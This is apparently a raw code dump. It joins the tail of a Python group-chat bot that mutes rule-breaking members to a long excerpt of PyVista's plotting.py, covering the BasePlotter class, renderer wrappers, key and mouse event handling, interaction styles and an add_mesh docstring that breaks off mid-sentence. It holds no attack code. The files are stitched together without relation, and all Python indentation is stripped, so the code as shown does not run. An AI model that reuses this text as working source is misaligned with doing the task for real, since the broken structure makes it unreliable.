if rule['punishment']['p'] == 'ban':
# the ban duration passed to set_group_ban is in seconds; report it in days
punishment = 'a mute of ' + str(rule['punishment']['times'] / (24 * 60 * 60)) + ' day(s)'
bot.set_group_ban(group_id=task['group_id'], user_id=task['user_id'],
duration=rule['punishment']['times'])
bot.send_group_msg(group_id=task['group_id'],
message=message.format(task['user_id'], percent, punishment))
except Exception as e:
print(e)
threading.Thread(target=main).start()
bot.run(host=bot_host, port=bot_port)
|
plotting.py
|
"""Pyvista plotting module."""
import collections.abc
import logging
import os
import time
import warnings
from functools import wraps
from threading import Thread
import imageio
import numpy as np
import vtk
from vtk.util import numpy_support as VN
from vtk.util.numpy_support import numpy_to_vtk, vtk_to_numpy
import pyvista
import scooby
from pyvista.utilities import (assert_empty_kwargs,
convert_array, convert_string_array, get_array,
is_pyvista_dataset, numpy_to_texture,
raise_not_matching, try_callback, wrap)
from .colors import get_cmap_safe
from .export_vtkjs import export_plotter_vtkjs
from .mapper import make_mapper
from .picking import PickingHelper
from .renderer import Renderer
from .background_renderer import BackgroundRenderer
from .theme import (FONT_KEYS, MAX_N_COLOR_BARS, parse_color,
parse_font_family, rcParams)
from .tools import normalize, opacity_transfer_function
from .widgets import WidgetHelper
try:
import matplotlib
has_matplotlib = True
except ImportError:
has_matplotlib = False
_ALL_PLOTTERS = {}
def close_all():
"""Close all open/active plotters and clean up memory."""
for key, p in _ALL_PLOTTERS.items():
if not p._closed:
p.close()
p.deep_clean()
_ALL_PLOTTERS.clear()
return True
log = logging.getLogger(__name__)
log.setLevel('CRITICAL')
class BasePlotter(PickingHelper, WidgetHelper):
"""To be used by the Plotter and QtInteractor classes.
Parameters
----------
shape : list or tuple, optional
Number of sub-render windows inside of the main window.
Specify two across with ``shape=(2, 1)`` and a two by two grid
with ``shape=(2, 2)``. By default there is only one renderer.
Can also accept a shape as string descriptor. E.g.:
shape="3|1" means 3 plots on the left and 1 on the right,
shape="4/2" means 4 plots on top of 2 at bottom.
border : bool, optional
Draw a border around each render window. Default False.
border_color : string or 3 item list, optional, defaults to white
Either a string, rgb list, or hex color string. For example:
color='white'
color='w'
color=[1, 1, 1]
color='#FFFFFF'
border_width : float, optional
Width of the border in pixels when enabled.
title : str, optional
Window title of the scalar bar
"""
mouse_position = None
click_position = None
def __new__(cls, *args, **kwargs):
"""Create an instance of base plotter."""
if cls is BasePlotter:
raise TypeError("pyvista.BasePlotter is an abstract class and may not be instantiated.")
return object.__new__(cls)
def __init__(self, shape=(1, 1), border=None, border_color='k',
border_width=2.0, title=None, splitting_position=None):
"""Initialize base plotter."""
self.image_transparent_background = rcParams['transparent_background']
self.mesh = None
if title is None:
title = rcParams['title']
self.title = str(title)
# by default add border for multiple plots
if border is None:
if shape != (1, 1):
border = True
else:
border = False
# add render windows
self._active_renderer_index = 0
self.renderers = []
if isinstance(shape, str):
if '|' in shape:
n = int(shape.split('|')[0])
m = int(shape.split('|')[1])
rangen = reversed(range(n))
rangem = reversed(range(m))
else:
m = int(shape.split('/')[0])
n = int(shape.split('/')[1])
rangen = range(n)
rangem = range(m)
if splitting_position is None:
splitting_position = rcParams['multi_rendering_splitting_position']
if splitting_position is None:
if n >= m:
xsplit = m/(n+m)
else:
xsplit = 1-n/(n+m)
else:
xsplit = splitting_position
for i in rangen:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(0, i/n, xsplit, (i+1)/n)
else:
arenderer.SetViewport(i/n, 0, (i+1)/n, xsplit)
self.renderers.append(arenderer)
for i in rangem:
arenderer = Renderer(self, border, border_color, border_width)
if '|' in shape:
arenderer.SetViewport(xsplit, i/m, 1, (i+1)/m)
else:
arenderer.SetViewport(i/m, xsplit, (i+1)/m, 1)
self.renderers.append(arenderer)
self.shape = (n+m,)
else:
assert_str = '"shape" should be a list, tuple or string descriptor'
assert isinstance(shape, collections.abc.Iterable), assert_str
assert shape[0] > 0, '"shape" must be positive'
assert shape[1] > 0, '"shape" must be positive'
self.shape = shape
for i in reversed(range(shape[0])):
for j in range(shape[1]):
renderer = Renderer(self, border, border_color, border_width)
x0 = i/shape[0]
y0 = j/shape[1]
x1 = (i+1)/shape[0]
y1 = (j+1)/shape[1]
renderer.SetViewport(y0, x0, y1, x1)
self.renderers.append(renderer)
# each render will also have an associated background renderer
self._background_renderers = [None for _ in range(len(self.renderers))]
# This keeps track of scalars names already plotted and their ranges
self._scalar_bar_ranges = {}
self._scalar_bar_mappers = {}
self._scalar_bar_actors = {}
self._scalar_bar_widgets = {}
# track if the camera has been setup
# self.camera_set = False
self._first_time = True
# Keep track of the scale
self._labels = []
# Set default style
self._style = vtk.vtkInteractorStyleRubberBandPick()
# this helps managing closed plotters
self._closed = False
# Add self to open plotters
self._id_name = "{}-{}".format(str(hex(id(self))), len(_ALL_PLOTTERS))
_ALL_PLOTTERS[self._id_name] = self
# lighting style
self.lighting = vtk.vtkLightKit()
# self.lighting.SetHeadLightWarmth(1.0)
# self.lighting.SetHeadLightWarmth(1.0)
for renderer in self.renderers:
self.lighting.AddLightsToRenderer(renderer)
renderer.LightFollowCameraOn()
# Key bindings
self.reset_key_events()
#### Manage the active Renderer ####
def loc_to_index(self, loc):
"""Return index of the render window given a location index.
Parameters
----------
loc : int, tuple, or list
Index of the renderer to add the actor to. For example,
``loc=2`` or ``loc=(1, 1)``.
Return
------
idx : int
Index of the render window.
"""
if loc is None:
return self._active_renderer_index
elif isinstance(loc, int):
return loc
elif isinstance(loc, collections.abc.Iterable):
if not len(loc) == 2:
raise AssertionError('"loc" must contain two items')
index_row = loc[0]
index_column = loc[1]
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
return idxs[index_row, index_column]
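# Hedged worked example (mirrors the reshape logic above): on a ``shape=(2, 2)`` plotter
# the flat indices are laid out as [[0, 1], [2, 3]], so ``loc_to_index((1, 1))`` returns 3
# and ``loc_to_index(2)`` is returned unchanged.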
def index_to_loc(self, index):
"""Convert a 1D index location to the 2D location on the plotting grid."""
if len(self.shape) == 1:
return index
sz = int(self.shape[0] * self.shape[1])
idxs = np.array([i for i in range(sz)], dtype=int).reshape(self.shape)
args = np.argwhere(idxs == index)
if len(args) < 1:
raise RuntimeError('Index ({}) is out of range.'.format(index))
return args[0]
@property
def renderer(self):
"""Return the active renderer."""
return self.renderers[self._active_renderer_index]
def subplot(self, index_row, index_column=None):
"""Set the active subplot.
Parameters
----------
index_row : int
Index of the subplot to activate along the rows.
index_column : int
Index of the subplot to activate along the columns.
"""
if len(self.shape) == 1:
self._active_renderer_index = index_row
return
if index_row < 0 or index_row >= self.shape[0]:
raise IndexError('Row index is out of range ({})'.format(self.shape[0]))
if index_column < 0 or index_column >= self.shape[1]:
raise IndexError('Column index is out of range ({})'.format(self.shape[1]))
self._active_renderer_index = self.loc_to_index((index_row, index_column))
#### Wrap Renderer methods ####
@wraps(Renderer.add_floor)
def add_floor(self, *args, **kwargs):
"""Wrap ``Renderer.add_floor``."""
return self.renderer.add_floor(*args, **kwargs)
@wraps(Renderer.remove_floors)
def remove_floors(self, *args, **kwargs):
"""Wrap ``Renderer.remove_floors``."""
return self.renderer.remove_floors(*args, **kwargs)
@wraps(Renderer.enable_anti_aliasing)
def enable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.enable_anti_aliasing``."""
self.renderer.enable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.disable_anti_aliasing)
def disable_anti_aliasing(self, *args, **kwargs):
"""Wrap ``Renderer.disable_anti_aliasing``."""
self.renderer.disable_anti_aliasing(*args, **kwargs)
@wraps(Renderer.set_focus)
def set_focus(self, *args, **kwargs):
"""Wrap ``Renderer.set_focus``."""
self.renderer.set_focus(*args, **kwargs)
self.render()
@wraps(Renderer.set_position)
def set_position(self, *args, **kwargs):
"""Wrap ``Renderer.set_position``."""
self.renderer.set_position(*args, **kwargs)
self.render()
@wraps(Renderer.set_viewup)
def set_viewup(self, *args, **kwargs):
"""Wrap ``Renderer.set_viewup``."""
self.renderer.set_viewup(*args, **kwargs)
self.render()
@wraps(Renderer.add_axes)
def add_axes(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes``."""
return self.renderer.add_axes(*args, **kwargs)
@wraps(Renderer.hide_axes)
def hide_axes(self, *args, **kwargs):
"""Wrap ``Renderer.hide_axes``."""
return self.renderer.hide_axes(*args, **kwargs)
@wraps(Renderer.show_axes)
def show_axes(self, *args, **kwargs):
"""Wrap ``Renderer.show_axes``."""
return self.renderer.show_axes(*args, **kwargs)
@wraps(Renderer.update_bounds_axes)
def update_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.update_bounds_axes``."""
return self.renderer.update_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_actor)
def add_actor(self, *args, **kwargs):
"""Wrap ``Renderer.add_actor``."""
return self.renderer.add_actor(*args, **kwargs)
@wraps(Renderer.enable_parallel_projection)
def enable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.enable_parallel_projection``."""
return self.renderer.enable_parallel_projection(*args, **kwargs)
@wraps(Renderer.disable_parallel_projection)
def disable_parallel_projection(self, *args, **kwargs):
"""Wrap ``Renderer.disable_parallel_projection``."""
return self.renderer.disable_parallel_projection(*args, **kwargs)
@wraps(Renderer.add_axes_at_origin)
def add_axes_at_origin(self, *args, **kwargs):
"""Wrap ``Renderer.add_axes_at_origin``."""
return self.renderer.add_axes_at_origin(*args, **kwargs)
@wraps(Renderer.show_bounds)
def show_bounds(self, *args, **kwargs):
"""Wrap ``Renderer.show_bounds``."""
return self.renderer.show_bounds(*args, **kwargs)
@wraps(Renderer.add_bounds_axes)
def add_bounds_axes(self, *args, **kwargs):
"""Wrap ``add_bounds_axes``."""
return self.renderer.add_bounds_axes(*args, **kwargs)
@wraps(Renderer.add_bounding_box)
def add_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.add_bounding_box``."""
return self.renderer.add_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounding_box)
def remove_bounding_box(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounding_box``."""
return self.renderer.remove_bounding_box(*args, **kwargs)
@wraps(Renderer.remove_bounds_axes)
def remove_bounds_axes(self, *args, **kwargs):
"""Wrap ``Renderer.remove_bounds_axes``."""
return self.renderer.remove_bounds_axes(*args, **kwargs)
@wraps(Renderer.show_grid)
def show_grid(self, *args, **kwargs):
"""Wrap ``Renderer.show_grid``."""
return self.renderer.show_grid(*args, **kwargs)
@wraps(Renderer.set_scale)
def set_scale(self, *args, **kwargs):
"""Wrap ``Renderer.set_scale``."""
return self.renderer.set_scale(*args, **kwargs)
@wraps(Renderer.enable_eye_dome_lighting)
def enable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.enable_eye_dome_lighting``."""
return self.renderer.enable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.disable_eye_dome_lighting)
def disable_eye_dome_lighting(self, *args, **kwargs):
"""Wrap ``Renderer.disable_eye_dome_lighting``."""
return self.renderer.disable_eye_dome_lighting(*args, **kwargs)
@wraps(Renderer.reset_camera)
def reset_camera(self, *args, **kwargs):
"""Wrap ``Renderer.reset_camera``."""
self.renderer.reset_camera(*args, **kwargs)
self.render()
@wraps(Renderer.isometric_view)
def isometric_view(self, *args, **kwargs):
"""Wrap ``Renderer.isometric_view``."""
return self.renderer.isometric_view(*args, **kwargs)
@wraps(Renderer.view_isometric)
def view_isometric(self, *args, **kwarg):
"""Wrap ``Renderer.view_isometric``."""
return self.renderer.view_isometric(*args, **kwarg)
@wraps(Renderer.view_vector)
def view_vector(self, *args, **kwarg):
"""Wrap ``Renderer.view_vector``."""
return self.renderer.view_vector(*args, **kwarg)
@wraps(Renderer.view_xy)
def view_xy(self, *args, **kwarg):
"""Wrap ``Renderer.view_xy``."""
return self.renderer.view_xy(*args, **kwarg)
@wraps(Renderer.view_yx)
def view_yx(self, *args, **kwarg):
"""Wrap ``Renderer.view_yx``."""
return self.renderer.view_yx(*args, **kwarg)
@wraps(Renderer.view_xz)
def view_xz(self, *args, **kwarg):
"""Wrap ``Renderer.view_xz``."""
return self.renderer.view_xz(*args, **kwarg)
@wraps(Renderer.view_zx)
def view_zx(self, *args, **kwarg):
"""Wrap ``Renderer.view_zx``."""
return self.renderer.view_zx(*args, **kwarg)
@wraps(Renderer.view_yz)
def view_yz(self, *args, **kwarg):
"""Wrap ``Renderer.view_yz``."""
return self.renderer.view_yz(*args, **kwarg)
@wraps(Renderer.view_zy)
def view_zy(self, *args, **kwarg):
"""Wrap ``Renderer.view_zy``."""
return self.renderer.view_zy(*args, **kwarg)
@wraps(Renderer.disable)
def disable(self, *args, **kwarg):
"""Wrap ``Renderer.disable``."""
return self.renderer.disable(*args, **kwarg)
@wraps(Renderer.enable)
def enable(self, *args, **kwarg):
"""Wrap ``Renderer.enable``."""
return self.renderer.enable(*args, **kwarg)
@wraps(Renderer.enable_depth_peeling)
def enable_depth_peeling(self, *args, **kwargs):
"""Wrap ``Renderer.enable_depth_peeling``."""
if hasattr(self, 'ren_win'):
result = self.renderer.enable_depth_peeling(*args, **kwargs)
if result:
self.ren_win.AlphaBitPlanesOn()
return result
@wraps(Renderer.disable_depth_peeling)
def disable_depth_peeling(self):
"""Wrap ``Renderer.disable_depth_peeling``."""
if hasattr(self, 'ren_win'):
self.ren_win.AlphaBitPlanesOff()
return self.renderer.disable_depth_peeling()
@wraps(Renderer.get_default_cam_pos)
def get_default_cam_pos(self, *args, **kwargs):
"""Wrap ``Renderer.get_default_cam_pos``."""
return self.renderer.get_default_cam_pos(*args, **kwargs)
@wraps(Renderer.remove_actor)
def remove_actor(self, actor, reset_camera=False):
"""Wrap ``Renderer.remove_actor``."""
for renderer in self.renderers:
renderer.remove_actor(actor, reset_camera)
return True
#### Properties from Renderer ####
@property
def camera(self):
"""Return the active camera of the active renderer."""
return self.renderer.camera
@camera.setter
def camera(self, camera):
"""Set the active camera for the rendering scene."""
self.renderer.camera = camera
@property
def camera_set(self):
"""Return if the camera of the active renderer has been set."""
return self.renderer.camera_set
@camera_set.setter
def camera_set(self, is_set):
"""Set if the camera has been set on the active renderer."""
self.renderer.camera_set = is_set
@property
def bounds(self):
"""Return the bounds of the active renderer."""
return self.renderer.bounds
@property
def length(self):
"""Return the length of the diagonal of the bounding box of the scene."""
return self.renderer.length
@property
def center(self):
"""Return the center of the active renderer."""
return self.renderer.center
@property
def _scalar_bar_slots(self):
"""Return the scalar bar slots of the active renderer."""
return self.renderer._scalar_bar_slots
@property
def _scalar_bar_slot_lookup(self):
"""Return the scalar bar slot lookup of the active renderer."""
return self.renderer._scalar_bar_slot_lookup
@_scalar_bar_slots.setter
def _scalar_bar_slots(self, value):
"""Set the scalar bar slots of the active renderer."""
self.renderer._scalar_bar_slots = value
@_scalar_bar_slot_lookup.setter
def _scalar_bar_slot_lookup(self, value):
"""Set the scalar bar slot lookup of the active renderer."""
self.renderer._scalar_bar_slot_lookup = value
@property
def scale(self):
"""Return the scaling of the active renderer."""
return self.renderer.scale
@scale.setter
def scale(self, scale):
"""Set the scaling of the active renderer."""
return self.renderer.set_scale(*scale)
@property
def camera_position(self):
"""Return camera position of the active render window."""
return self.renderer.camera_position
@camera_position.setter
def camera_position(self, camera_location):
"""Set camera position of the active render window."""
self.renderer.camera_position = camera_location
@property
def background_color(self):
"""Return the background color of the first render window."""
return self.renderers[0].GetBackground()
@background_color.setter
def background_color(self, color):
"""Set the background color of all the render windows."""
self.set_background(color)
#### Properties of the BasePlotter ####
@property
def window_size(self):
"""Return the render window size."""
return list(self.ren_win.GetSize())
@window_size.setter
def window_size(self, window_size):
"""Set the render window size."""
self.ren_win.SetSize(window_size[0], window_size[1])
@property
def image_depth(self):
"""Return a depth image representing current render window.
Helper attribute for ``get_image_depth``.
"""
return self.get_image_depth()
@property
def image(self):
"""Return an image array of current render window."""
if not hasattr(self, 'ren_win') and hasattr(self, 'last_image'):
return self.last_image
ifilter = vtk.vtkWindowToImageFilter()
ifilter.SetInput(self.ren_win)
ifilter.ReadFrontBufferOff()
if self.image_transparent_background:
ifilter.SetInputBufferTypeToRGBA()
else:
ifilter.SetInputBufferTypeToRGB()
return self._run_image_filter(ifilter)
#### Everything else ####
def render(self):
"""Render the main window.
If this is called before ``show()``, nothing will happen.
"""
if hasattr(self, 'ren_win') and not self._first_time:
self.ren_win.Render()
# Not sure if this is ever needed but here as a reminder
# if hasattr(self, 'iren') and not self._first_time:
# self.iren.Render()
return
def add_key_event(self, key, callback):
"""Add a function to callback when the given key is pressed.
These are non-unique - thus a key could map to many callback
functions. The callback function must not have any arguments.
Parameters
----------
key : str
The key to trigger the event
callback : callable
A callable that takes no arguments
"""
if not hasattr(callback, '__call__'):
raise TypeError('callback must be callable.')
self._key_press_event_callbacks[key].append(callback)
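# Hedged usage sketch (names are illustrative): register a zero-argument callback, e.g.
#   plotter.add_key_event('space', lambda: print('space pressed'))
# Several callbacks may be attached to the same key; remove them again with
# ``clear_events_for_key('space')`` defined below.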
def _add_observer(self, event, call):
if hasattr(self, 'iren'):
self._observers[event] = self.iren.AddObserver(event, call)
def _remove_observer(self, event):
if hasattr(self, 'iren') and event in self._observers:
self.iren.RemoveObserver(event)
del self._observers[event]
def clear_events_for_key(self, key):
"""Remove the callbacks associated to the key."""
self._key_press_event_callbacks.pop(key)
def store_mouse_position(self, *args):
"""Store mouse position."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.mouse_position = self.iren.GetEventPosition()
def store_click_position(self, *args):
"""Store click position in viewport coordinates."""
if not hasattr(self, "iren"):
raise AttributeError("This plotting window is not interactive.")
self.click_position = self.iren.GetEventPosition()
self.mouse_position = self.click_position
def track_mouse_position(self):
"""Keep track of the mouse position.
This will potentially slow down the interactor. No callbacks supported
here - use :func:`pyvista.BasePlotter.track_click_position` instead.
"""
if hasattr(self, "iren"):
self._add_observer(vtk.vtkCommand.MouseMoveEvent,
self.store_mouse_position)
def untrack_mouse_position(self):
"""Stop tracking the mouse position."""
self._remove_observer(vtk.vtkCommand.MouseMoveEvent)
def track_click_position(self, callback=None, side="right",
viewport=False):
"""Keep track of the click position.
By default, it only tracks right clicks.
Parameters
----------
callback : callable
A callable method that will use the click position. Passes the
click position as a length two tuple.
side : str
The side of the mouse button to track (left or right).
Default is right. Also accepts ``'r'`` or ``'l'``.
viewport: bool
If ``True``, uses the normalized viewport coordinate system
(values between 0.0 and 1.0 and support for HiDPI) when passing the
click position to the callback
"""
if not hasattr(self, "iren"):
return
side = str(side).lower()
if side in ["right", "r"]:
event = vtk.vtkCommand.RightButtonPressEvent
elif side in ["left", "l"]:
event = vtk.vtkCommand.LeftButtonPressEvent
else:
raise TypeError("Side ({}) not supported. Try `left` or `right`".format(side))
def _click_callback(obj, event):
self.store_click_position()
if hasattr(callback, '__call__'):
if viewport:
try_callback(callback, self.click_position)
else:
try_callback(callback, self.pick_click_position())
self._add_observer(event, _click_callback)
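# Hedged usage sketch: print the picked 3D position on left clicks, e.g.
#   plotter.track_click_position(callback=lambda pos: print(pos), side='left')
# With ``viewport=True`` the callback receives the stored click position directly
# instead of the picked 3D point.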
def untrack_click_position(self):
"""Stop tracking the click position."""
if hasattr(self, "_click_observer"):
self.iren.RemoveObserver(self._click_observer)
del self._click_observer
def _prep_for_close(self):
"""Make sure a screenshot is acquired before closing.
This doesn't actually close anything! It just preps the plotter for
closing.
"""
# Grab screenshot right before renderer closes
self.last_image = self.screenshot(True, return_img=True)
self.last_image_depth = self.get_image_depth()
def increment_point_size_and_line_width(self, increment):
"""Increment point size and line width of all actors.
For every actor in the scene, increment both its point size and
line width by the given value.
"""
for renderer in self.renderers:
for actor in renderer._actors.values():
if hasattr(actor, "GetProperty"):
prop = actor.GetProperty()
if hasattr(prop, "SetPointSize"):
prop.SetPointSize(prop.GetPointSize() + increment)
if hasattr(prop, "SetLineWidth"):
prop.SetLineWidth(prop.GetLineWidth() + increment)
self.render()
return
def reset_key_events(self):
"""Reset all of the key press events to their defaults."""
self._key_press_event_callbacks = collections.defaultdict(list)
self.add_key_event('q', self._prep_for_close) # Add no matter what
b_left_down_callback = lambda: self._add_observer('LeftButtonPressEvent', self.left_button_down)
self.add_key_event('b', b_left_down_callback)
self.add_key_event('v', lambda: self.isometric_view_interactive())
self.add_key_event('f', self.fly_to_mouse_position)
self.add_key_event('C', lambda: self.enable_cell_picking())
self.add_key_event('Up', lambda: self.camera.Zoom(1.05))
self.add_key_event('Down', lambda: self.camera.Zoom(0.95))
self.add_key_event('plus', lambda: self.increment_point_size_and_line_width(1))
self.add_key_event('minus', lambda: self.increment_point_size_and_line_width(-1))
def key_press_event(self, obj, event):
"""Listen for key press event."""
try:
key = self.iren.GetKeySym()
log.debug('Key %s pressed' % key)
self._last_key = key
if key in self._key_press_event_callbacks.keys():
# Note that defaultdicts never throw a KeyError
callbacks = self._key_press_event_callbacks[key]
for func in callbacks:
func()
except Exception as e:
log.error('Exception encountered for keypress "%s": %s' % (key, e))
def left_button_down(self, obj, event_type):
"""Register the event for a left button down click."""
# Get 2D click location on window
click_pos = self.iren.GetEventPosition()
# Get corresponding click location in the 3D plot
picker = vtk.vtkWorldPointPicker()
picker.Pick(click_pos[0], click_pos[1], 0, self.renderer)
self.pickpoint = np.asarray(picker.GetPickPosition()).reshape((-1, 3))
if np.any(np.isnan(self.pickpoint)):
self.pickpoint[:] = 0
def update_style(self):
"""Update the camera interactor style."""
if not hasattr(self, '_style'):
self._style = vtk.vtkInteractorStyleTrackballCamera()
if hasattr(self, 'iren'):
return self.iren.SetInteractorStyle(self._style)
def enable_trackball_style(self):
"""Set the interactive style to trackball camera.
The trackball camera is the default interactor style.
"""
self._style = vtk.vtkInteractorStyleTrackballCamera()
return self.update_style()
def enable_trackball_actor_style(self):
"""Set the interactive style to trackball actor.
This allows actors to be rotated around the scene.
"""
self._style = vtk.vtkInteractorStyleTrackballActor()
return self.update_style()
def enable_image_style(self):
"""Set the interactive style to image.
Controls:
- Left Mouse button triggers window level events
- CTRL Left Mouse spins the camera around its view plane normal
- SHIFT Left Mouse pans the camera
- CTRL SHIFT Left Mouse dollys (a positional zoom) the camera
- Middle mouse button pans the camera
- Right mouse button dollys the camera.
- SHIFT Right Mouse triggers pick events
"""
self._style = vtk.vtkInteractorStyleImage()
return self.update_style()
def enable_joystick_style(self):
"""Set the interactive style to joystick.
It allows the user to move (rotate, pan, etc.) the camera, the point of
view for the scene. The position of the mouse relative to the center of
the scene determines the speed at which the camera moves, and the speed
of the mouse movement determines the acceleration of the camera, so the
camera continues to move even if the mouse is not moving.
For a 3-button mouse, the left button is for rotation, the right button
for zooming, the middle button for panning, and ctrl + left button for
spinning. (With fewer mouse buttons, ctrl + shift + left button is
for zooming, and shift + left button is for panning.)
"""
self._style = vtk.vtkInteractorStyleJoystickCamera()
return self.update_style()
def enable_zoom_style(self):
"""Set the interactive style to rubber band zoom.
This interactor style allows the user to draw a rectangle in the render
window using the left mouse button. When the mouse button is released,
the current camera zooms by an amount determined from the shorter side
of the drawn rectangle.
"""
self._style = vtk.vtkInteractorStyleRubberBandZoom()
return self.update_style()
def enable_terrain_style(self):
"""Set the interactive style to terrain.
Used to manipulate a camera which is viewing a scene with a natural
view up, e.g., terrain. The camera in such a scene is manipulated by
specifying azimuth (angle around the view up vector) and elevation
(the angle from the horizon).
"""
self._style = vtk.vtkInteractorStyleTerrain()
return self.update_style()
def enable_rubber_band_style(self):
"""Set the interactive style to rubber band picking.
This interactor style allows the user to draw a rectangle in the render
window by hitting 'r' and then using the left mouse button.
When the mouse button is released, the attached picker operates on the
pixel in the center of the selection rectangle. If the picker happens to
be a vtkAreaPicker it will operate on the entire selection rectangle.
When the 'p' key is hit the above pick operation occurs on a 1x1
rectangle. In other respects it behaves the same as its parent class.
"""
self._style = vtk.vtkInteractorStyleRubberBandPick()
return self.update_style()
def hide_axes_all(self):
"""Hide the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.hide_axes()
return
def show_axes_all(self):
"""Show the axes orientation widget in all renderers."""
for renderer in self.renderers:
renderer.show_axes()
return
def isometric_view_interactive(self):
"""Set the current interactive render window to isometric view."""
interactor = self.iren.GetInteractorStyle()
renderer = interactor.GetCurrentRenderer()
if renderer is None:
renderer = self.renderer
renderer.view_isometric()
def update(self, stime=1, force_redraw=True):
"""Update window, redraw, process messages query.
Parameters
----------
stime : int, optional
Duration of timer that interrupt vtkRenderWindowInteractor in
milliseconds.
force_redraw : bool, optional
Call ``render`` immediately.
"""
if stime <= 0:
stime = 1
curr_time = time.time()
if Plotter.last_update_time > curr_time:
Plotter.last_update_time = curr_time
if not hasattr(self, 'iren'):
return
update_rate = self.iren.GetDesiredUpdateRate()
if (curr_time - Plotter.last_update_time) > (1.0/update_rate):
self.right_timer_id = self.iren.CreateRepeatingTimer(stime)
self.iren.Start()
self.iren.DestroyTimer(self.right_timer_id)
self.render()
Plotter.last_update_time = curr_time
elif force_redraw:
self.render()
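# Hedged usage sketch (a typical pattern, not from the original docs): an animation loop
# mutates the plotted data in place and then calls ``plotter.update()`` or
# ``plotter.update(stime=10)`` each iteration so the interactor stays responsive;
# ``force_redraw=False`` avoids an unconditional re-render.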
def add_mesh(self, mesh, color=None, style=None, scalars=None,
clim=None, show_edges=None, edge_color=None,
point_size=5.0, line_width=None, opacity=1.0,
flip_scalars=False, lighting=None, n_colors=256,
interpolate_before_map=True, cmap=None, label=None,
reset_camera=None, scalar_bar_args=None, show_scalar_bar=None,
stitle=None, multi_colors=False, name=None, texture=None,
render_points_as_spheres=None, render_lines_as_tubes=False,
smooth_shading=False, ambient=0.0, diffuse=1.0, specular=0.0,
specular_power=100.0, nan_color=None, nan_opacity=1.0,
culling=None, rgb=False, categories=False,
use_transparency=False, below_color=None, above_color=None,
annotations=None, pickable=True, preference="point",
log_scale=False, **kwargs):
"""Add any PyVista/VTK mesh or dataset that PyVista can wrap to the scene.
This method is using a mesh representation to view the surfaces
and/or geometry of datasets. For volume rendering, see
:func:`pyvista.BasePlotter.add_volume`.
Parameters
----------
mesh : pyvista.Common or pyvista.MultiBlock
Any PyVista or VTK mesh is supported. Also, any dataset
that :func:`pyvista.wrap` can handle including NumPy arrays of XYZ
points.
color : string or 3 item list, optional, defaults to white
Use to make the entire mesh have a single solid color.
Either a string, RGB list, or hex color string. For example:
``color='white'``, ``color='w'``, ``color=[1, 1, 1]``, or
``color='#FFFFFF'``. Color will be overridden if scalars are
specified.
style : string, optional
Visualization style of the mesh. One of the following:
``style='surface'``, ``style='wireframe'``, ``style='points'``.
Defaults to ``'surface'``. Note that ``'wireframe'`` only shows a
wireframe of the outer geometry.
scalars : str or numpy.ndarray, optional
Scalars used to "color" the mesh. Accepts a string name of an
array that is present on the mesh or an array equal
to the number of cells or the number of points in the
mesh. Array should be sized as a single vector. If both
``color`` and ``scalars`` are ``None``, then the active scalars are
used.
clim : 2 item list, optional
Color bar range for scalars. Defaults to minimum and
maximum of scalars array. Example: ``[-1, 2]``. ``rng``
is also an accepted alias for this.
show_edges : bool, optional
Shows the edges of a mesh. Does not apply to a wireframe
representation.
edge_color : string or 3 item list, optional, defaults to black
The solid color to give the edges when ``show_edges=True``.
Either a string, RGB list, or hex color string.
point_size : float, optional
Point size of any nodes in the dataset plotted. Also applicable
when style='points'. Default ``5.0``
line_width : float, optional
Thickness of lines. Only valid for wireframe and surface
representations. Default None.
opacity : float, str, array-like
Opacity of the mesh. If a single float value is given, it will be
the global opacity of the mesh and uniformly applied everywhere -
should be between 0 and 1. A string can also be specified to map
the scalars range to a predefined opacity transfer function
(options include: 'linear', 'linear_r', 'geom', 'geom_r').
A string could also be used to map a scalars array from the mesh to
the opacity (must have same number of elements as the
``scalars`` argument). Or you can pass a custom-made transfer
function that is an array either ``n_colors`` in length or shorter.
flip_scalars : bool, optional
Flip direction of cmap. Most colormaps allow ``*_r`` suffix to do
this as well.
lighting : bool, optional
Enable or disable view direction lighting. Default False.
n_colors : int, optional
Number of colors to use when displaying scalars. Defaults to 256.
The scalar bar will also have this many colors.
interpolate_before_map : bool, optional
Enabling makes for a smoother scalars display. Default is True.
When False, OpenGL will interpolate the mapped colors which can
result in showing colors that are not present in the color map.
cmap : str, list, optional
Name of the Matplotlib colormap to use when mapping the ``scalars``.
See available Matplotlib colormaps. Only applicable for when
displaying ``scalars``. Requires Matplotlib to be installed.
``colormap`` is also an accepted alias for this. If ``colorcet`` or
``cmocean`` are installed, their colormaps can be specified by name.
You can also specify a list of colors to override an
existing colormap with a custom one. For example, to
create a three color colormap you might specify
``['green', 'red', 'blue']``
label : str, optional
String label to use when adding a legend to the scene with
:func:`pyvista.BasePlotter.add_legend`
reset_camera : bool, optional
Reset the camera after adding this mesh to the scene
scalar_bar_args : dict, optional
Dictionary of keyword arguments to pass when adding the scalar bar
to the scene. For options, see
:func:`pyvista.BasePlotter.add_scalar_bar`.
show_scalar_bar : bool
If False, a scalar bar will not be added to the scene. Defaults
to ``True``.
stitle : string, optional
Scalar bar title. By default the scalar bar is given a title of the
scalars array used to color the mesh.
To create a bar with no title, use an empty string (i.e. '').
multi_colors : bool, optional
If a ``MultiBlock`` dataset is given this will color each
block by a solid color using matplotlib's color cycler.
name : str, optional
The name for the added mesh/actor so that it can be easily
updated. If an actor of this name already exists in the
rendering window, it will be replaced by the new actor.
texture : vtk.vtkTexture or np.ndarray or boolean, optional
A texture to apply if the input mesh has texture
coordinates. This will not work with MultiBlock
datasets. If set to ``True``, the first available texture
